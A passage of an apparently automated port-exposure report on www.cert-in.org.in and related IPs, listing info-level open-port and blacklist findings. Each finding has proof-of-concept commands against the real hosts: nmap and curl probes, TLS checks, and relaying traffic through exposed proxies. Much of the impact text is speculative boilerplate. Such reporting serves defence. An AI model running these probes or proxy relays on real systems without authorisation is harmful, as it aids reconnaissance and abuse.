files, or APIs. Even if benign, unnecessary open ports increase risk due to potential future misconfigurations or undetected vulnerabilities.\n\n---\n\n### Open Port 8008/tcp on 14.139.54.229\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 14.139.54.229 |\n\n**Description** \nThe presence of an open port 8008/tcp indicates another instance of a potentially non-standard HTTP-based service hosted on `14.139.54.229`. Historically associated with alternative HTTP servers or embedded device management interfaces, this port should be carefully evaluated for purpose, accessibility, and security posture.\n\nIf left unrestricted, attackers may leverage this interface for reconnaissance or exploitation depending on its implementation.\n\n**Attack Scenario (Proof of Concept)** \n1. Reconnaissance reveals port 8008 is active:\n ```bash\n nmap -sV -p 8008 14.139.54.229\n ```\n2. The attacker sends an HTTP request:\n ```bash\n curl -I http://14.139.54.229:8008/\n ```\n3. Based on returned headers or responses, the attacker attempts directory traversal, brute-force login, or exploits known CVEs related to the identified service version.\n\n**Business Impact** \nEach additional open port expands the organization’s digital footprint and introduces new vectors for compromise. Insecurely configured services on alternate ports are frequently overlooked in audits but remain accessible to adversaries conducting broad-spectrum scanning campaigns.\n\n---\n\n### Open Port 80/tcp on 59.176.167.109\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 59.176.167.109 |\n\n**Description** \nPort 80/tcp is open on the asset `59.176.167.109`, which corresponds to the domain `https://www.cert-in.org.in/`. This represents the default HTTP port and is expected for public-facing websites. However, when combined with HTTPS-only policies, plain HTTP availability may introduce downgrade attacks or mixed-content issues unless properly redirected.\n\nThis finding confirms basic connectivity and visibility from external networks.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker initiates connection over HTTP:\n ```bash\n curl http://59.176.167.109/\n ```\n2. If redirection is missing or improperly enforced, sensitive cookies or session tokens transmitted over HTTP could be intercepted.\n3. Alternatively, phishing pages mimicking legitimate domains may be served here if the server lacks strict TLS enforcement.\n\n**Business Impact** \nWhile essential for website functionality, insecure handling of HTTP traffic undermines trust and compliance frameworks requiring encrypted communications. Organizations relying solely on HTTP expose users to man-in-the-middle threats and violate best practices around secure transport.\n\n---\n\n### Open Port 443/tcp on 59.176.167.109\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | 59.176.167.109 |\n\n**Description** \nPort 443/tcp is open on `59.176.167.109`, signifying support for HTTPS connections. As the standard port for secure web communication, this is necessary for protecting user privacy and ensuring integrity of transmitted data. Proper certificate validation and cipher suite selection are critical to maintaining this protection layer.\n\nMisconfigurations in SSL/TLS settings can still leave systems vulnerable despite having port 443 open.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker checks TLS configuration:\n ```bash\n openssl s_client -connect 59.176.167.109:443 -servername www.cert-in.org.in\n ```\n2. Weak protocols (e.g., TLS 1.0), expired certificates, or insufficient key lengths may be discovered.\n3. These flaws enable downgrade attacks or certificate spoofing under certain conditions.\n\n**Business Impact** \nFailure to maintain robust TLS implementations erodes confidence in online transactions and exposes organizations to regulatory scrutiny. Poor cryptographic hygiene also facilitates interception of confidential communications, undermining both legal and operational security objectives.\n\n---\n\n### Open Port 80/tcp (HTTP) on www.cert-in.org.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.cert-in.org.in |\n\n**Description** \nThe domain `www.cert-in.org.in` has port 80 open, serving HTTP traffic. Although common practice for redirecting to HTTPS, failure to enforce redirects leaves room for plaintext transmission of credentials or session identifiers. Additionally, legacy clients or crawlers may continue accessing insecure endpoints unless explicitly blocked.\n\nThis represents a baseline requirement for modern web infrastructure but requires careful policy enforcement.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker accesses insecure endpoint:\n ```bash\n curl http://www.cert-in.org.in/\n ```\n2. If no automatic redirect occurs, forms or links pointing to insecure paths may leak sensitive input.\n3. Passive eavesdropping becomes feasible on shared or compromised networks.\n\n**Business Impact** \nInconsistent application of HTTPS policies weakens overall cybersecurity resilience. Regulatory bodies increasingly mandate full encryption for all web interactions, making partial coverage a liability rather than a convenience.\n\n---\n\n### Open Port 443/tcp (HTTPS) on www.cert-in.org.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.cert-in.org.in |\n\n**Description** \nPort 443/tcp is confirmed open on `www.cert-in.org.in`, enabling encrypted web browsing. This is crucial for safeguarding visitor interactions, especially those involving personal or classified information. Ensuring up-to-date TLS versions, strong ciphers, and valid certificates remains paramount to preserving confidentiality and authenticity.\n\nAny lapses in certificate lifecycle management or protocol support degrade trustworthiness.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker inspects certificate chain:\n ```bash\n echo | openssl s_client -showcerts -connect www.cert-in.org.in:443 2>/dev/null | openssl x509 -text -noout\n ```\n2. Expired or self-signed certificates raise flags about legitimacy.\n3. Outdated protocols like SSLv3 or RC4 usage signal poor cryptographic hygiene.\n\n**Business Impact** \nA flawed HTTPS setup damages credibility and violates compliance standards such as PCI DSS or GDPR. Users encountering warnings or errors may abandon engagement entirely, impacting mission-critical outreach efforts typical for CERT-type institutions.\n\n---\n\n### Open Port 8008/tcp (HTTP) on www.cert-in.org.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.cert-in.org.in |\n\n**Description** \nAn auxiliary HTTP listener operates on port 8008 for `www.cert-in.org.in`. Such secondary ports often host development environments, staging areas, or internal dashboards inadvertently exposed to the internet. Their inclusion in production environments demands rigorous review and justification.\n\nImproperly secured alternate ports provide attackers with low-hanging fruit for gaining footholds inside protected perimeters.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker probes alternate port:\n ```bash\n curl http://www.cert-in.org.in:8008/\n ```\n2. Responses revealing debug output, stack traces, or admin panels suggest inadequate sanitization.\n3. Brute-force attempts against login portals found on such ports frequently succeed due to weaker credential policies.\n\n**Business Impact** \nSecondary HTTP listeners bypass primary defense layers designed for mainline traffic. They often escape routine patch cycles or logging regimes, creating blind spots where breaches go undetected until significant damage accumulates.\n\n---\n\n### Open Port 8015/tcp (HTTP Proxy – FortiGuard Web Filtering) on www.cert-in.org.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.cert-in.org.in |\n\n**Description** \nPort 8015 hosts an HTTP proxy service identified as Fortinet’s FortiGuard Web Filtering solution. Proxies deployed externally without stringent access control create opportunities for misuse, including bypassing filtering rules or leveraging them for anonymized traffic relay.\n\nGiven their role in enforcing organizational policies, exposing such components publicly contradicts intended deployment models.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker tests proxy capabilities:\n ```bash\n curl --proxy http://www.cert-in.org.in:8015 http://example.com\n ```\n2. Successful relay confirms functional proxy operation.\n3. Malicious actors may route illicit traffic through the proxy to obfuscate origins or evade detection.\n\n**Business Impact** \nPublicly accessible proxies undermine network governance and expose organizations to legal liabilities stemming from abuse. Misuse scenarios include spam relaying, malware distribution, or circumvention of parental/governmental restrictions—particularly concerning for entities like CERT-IN.\n\n---\n\n### Open Port 8020/tcp (HTTP Proxy – FortiGuard Web Filtering) on www.cert-in.org.in\n\n| Field | Value |\n|---|---|\n| Severity | Info |\n| CVSS Score | 0.0 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.cert-in.org.in |\n\n**Description** \nSimilar to port 8015, port 8020 runs a FortiGuard Web Filtering proxy. Multiple proxy instances exposed simultaneously suggest either redundancy or misconfiguration. Regardless, each constitutes a potential vector for unauthorized access or abuse unless strictly controlled.\n\nSuch exposures conflict with zero-trust principles and increase complexity in managing access boundaries.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker verifies proxy functionality:\n ```bash\n curl --proxy http://www.cert-in.org.in:8020 https://target-site.com\n ```\n2. If successful, the proxy can be leveraged for outbound scanning, tunneling, or evading local firewalls.\n3. Automated scripts may cycle between available proxies seeking one with relaxed restrictions.\n\n**Business Impact** \nMultiple exposed proxies amplify the risk profile significantly. Even if individually benign, collectively they form a distributed attack platform ripe for exploitation by threat actors seeking anonymity or evasion techniques.\n\n---\n\n### Host Flagged on Blacklist list.quorum.to: SPAM\n\n| Field | Value |\n|---|---|\n| Severity | Low |\n| CVSS Score | 3.7 (AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N) |\n| Category | network_exposure |\n| Asset / URL | www.cert-in.org.in |\n\n**Description** \nThe domain `www.cert-in.org.in` appears listed on the DNS blacklist `list.quorum.to` for sending spam emails. Being blacklisted affects email deliverability and tarnishes institutional reputation. It suggests either compromised mail servers, misconfigured SMTP relays, or spoofed sender identities originating from the domain/IP space.\n\nReputation recovery involves delisting procedures and root cause analysis.\n\n**Attack Scenario (Proof of Concept)** \n1. Attacker compromises a server within the domain’s subnet.\n2. Installs an open relay SMTP daemon or uses existing ones.\n3. Sends bulk unsolicited messages masquerading as legitimate senders.\n4. Anti-spam filters flag the originating IPs, resulting in listing on quorum.to.\n\n**Business Impact** \nBlacklisting severely impacts official correspondence delivery rates, affecting stakeholder communications and emergency alerts. Reputational harm extends beyond technical circles, influencing public perception of competence and reliability—especially detrimental for authoritative cybersecurity agencies.","summary":{"total":11}},"summary":{"total":11}}]